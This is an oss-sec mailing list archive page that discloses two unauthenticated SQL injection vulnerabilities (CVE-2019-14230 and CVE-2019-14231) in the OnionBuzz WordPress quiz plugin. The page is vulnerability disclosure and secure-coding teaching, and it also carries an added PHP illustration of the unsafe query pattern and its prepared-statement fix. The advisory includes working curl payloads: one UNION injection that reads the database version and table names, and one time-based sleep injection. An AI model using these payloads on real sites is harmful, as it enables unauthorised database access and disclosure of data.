oss-sec mailing list archives
Re: Two unauthenticated SQL injection vulnerabilities in Onionbuzz WordPress plugin
From: Eugene Kolo <eugene () eugenekolo com>
Date: Mon, 22 Jul 2019 23:04:25 -0400
Assigned CVE-2019-14230 and CVE-2019-14231.

On Sat, Jul 20, 2019 at 6:35 PM Eugene Kolo <eugene () eugenekolo com> wrote:
Two unauthenticated/unprivileged SQL injection vulnerabilities in the Viral Quiz Maker - Onionbuzz WordPress plugin.

Information
===========
Affected Product: Viral Quiz Maker - OnionBuzz WordPress plugin
Vendor Homepage: Onionbuzz.com
Vulnerability Type: SQL Injection
Discoverer: Eugene Kolodenker
Date: July-20-2019

1) Description
===========
Prior to v1.2.2, you could exploit the `points` parameter in the `ob_get_results` ajax nopriv handler due to there being no sanitization on the points argument. The points parameter is not sanitized prior to being used in a SQL query in getResultByPointsTrivia. This allows an unauthenticated/unprivileged user to perform a SQL injection attack capable of remote code execution and information disclosure.

Proof of Concept (POC)
======================
```
curl http://site/wp-admin/admin-ajax.php?action=ob_get_results --data "type=get_result&id=1&quiz_type=5&points=1 or 1=0 union all select 1,1,version(),table_name,1,1,1,1,1 from information_schema.tables;#"
```
And get back:
```
{"quiz_id":1,"points":"1 or 1=0 union all select 1,1,version(),table_name,1,1,1,1,1 from information_schema.tables;#","title":<DBVERSION>","description":"CHARACTER_SETS","featured_image":"<img src=\"1\">","image_caption":"1","is_image":1,"success":1}
```

2) Description
===========
Prior to v1.2.7, you could exploit the `id` parameter in the `set_count` ajax nopriv handler due to there being no sanitization on the id argument. The id parameter is not sanitized prior to being used in a SQL query in saveQuestionVote. This allows an unauthenticated/unprivileged user to perform a SQL injection attack capable of remote code execution and information disclosure.

Proof of Concept (POC)
======================
```
curl http://site/wp-admin/admin-ajax.php?type=set_count --data "action=ob_question_votes&id=1 or sleep(10);#"
```
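Both findings above share one root cause: a request parameter (`points` in one handler, `id` in the other) reaches a SQL statement through a `wp_ajax_nopriv_*` handler without being validated or bound. The following is an added illustration of that pattern and its fix, written for this archive page; it is not the OnionBuzz plugin's code, and the function names, hook names, table names (`example_quiz_results`, `example_question_votes`) and column names are assumptions chosen for the example.

```php
<?php
// Added illustration, not the OnionBuzz plugin's own code. All table, column,
// hook and function names below are assumptions made for this example.

// Unsafe pattern: the request value is interpolated straight into the SQL text.
// A value such as "1 or 1=0 union all select ..." therefore changes the shape of
// the statement instead of being compared as a number.
function example_get_result_unsafe( $quiz_id, $points ) {
    global $wpdb;
    $table = $wpdb->prefix . 'example_quiz_results';
    $sql   = "SELECT * FROM {$table} WHERE quiz_id = {$quiz_id} AND min_points <= {$points} ORDER BY min_points DESC LIMIT 1";
    return $wpdb->get_row( $sql );
}

// Hardened pattern: coerce to the expected type, then bind with $wpdb->prepare().
// %d placeholders only ever emit an integer, so the query structure is fixed.
function example_get_result_safe( $quiz_id, $points ) {
    global $wpdb;
    $quiz_id = absint( $quiz_id );   // non-negative integer, 0 on garbage
    $points  = intval( $points );    // "1 or 1=0 union ..." becomes 1
    $table   = $wpdb->prefix . 'example_quiz_results';
    $sql     = $wpdb->prepare(
        "SELECT * FROM {$table} WHERE quiz_id = %d AND min_points <= %d ORDER BY min_points DESC LIMIT 1",
        $quiz_id,
        $points
    );
    return $wpdb->get_row( $sql );
}

// Same treatment for a vote counter keyed by a question id: the id is bound as
// an integer, so a payload such as "1 or sleep(10)" cannot alter the statement.
function example_save_question_vote_safe( $question_id ) {
    global $wpdb;
    $question_id = absint( $question_id );
    if ( 0 === $question_id ) {
        return false;   // reject instead of silently voting for row 0
    }
    $table = $wpdb->prefix . 'example_question_votes';
    $rows  = $wpdb->query( $wpdb->prepare(
        "UPDATE {$table} SET votes = votes + 1 WHERE question_id = %d",
        $question_id
    ) );
    return false !== $rows && $rows > 0;
}

// AJAX handlers registered on the nopriv hook are reachable by anyone who can
// request admin-ajax.php, so every parameter must be treated as hostile input.
function example_ajax_get_results() {
    if ( ! isset( $_POST['id'], $_POST['points'] ) ) {
        wp_send_json_error( 'missing parameters', 400 );
    }
    $row = example_get_result_safe( $_POST['id'], $_POST['points'] );
    if ( ! $row ) {
        wp_send_json_error( 'no result', 404 );
    }
    wp_send_json_success( $row );
}

function example_ajax_question_vote() {
    if ( ! isset( $_POST['id'] ) ) {
        wp_send_json_error( 'missing id', 400 );
    }
    if ( ! example_save_question_vote_safe( $_POST['id'] ) ) {
        wp_send_json_error( 'unknown question', 404 );
    }
    wp_send_json_success();
}

add_action( 'wp_ajax_nopriv_example_get_results', 'example_ajax_get_results' );
add_action( 'wp_ajax_example_get_results',        'example_ajax_get_results' );
add_action( 'wp_ajax_nopriv_example_question_vote', 'example_ajax_question_vote' );
add_action( 'wp_ajax_example_question_vote',        'example_ajax_question_vote' );
```

When reviewing a plugin for this class of bug, the quickest check is to list every `wp_ajax_nopriv_` registration and follow each parameter it reads from `$_GET`/`$_POST`/`$_REQUEST` into the first `$wpdb` call: anything that reaches `get_row`, `get_results`, `query` or similar without passing through `$wpdb->prepare()` (or an equivalent typed cast for numeric values) is a candidate for exactly the issue reported here.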
Current thread:
- Two unauthenticated SQL injection vulnerabilities in Onionbuzz WordPress plugin Eugene Kolo (Jul 21)
- Re: Two unauthenticated SQL injection vulnerabilities in Onionbuzz WordPress plugin Eugene Kolo (Jul 22)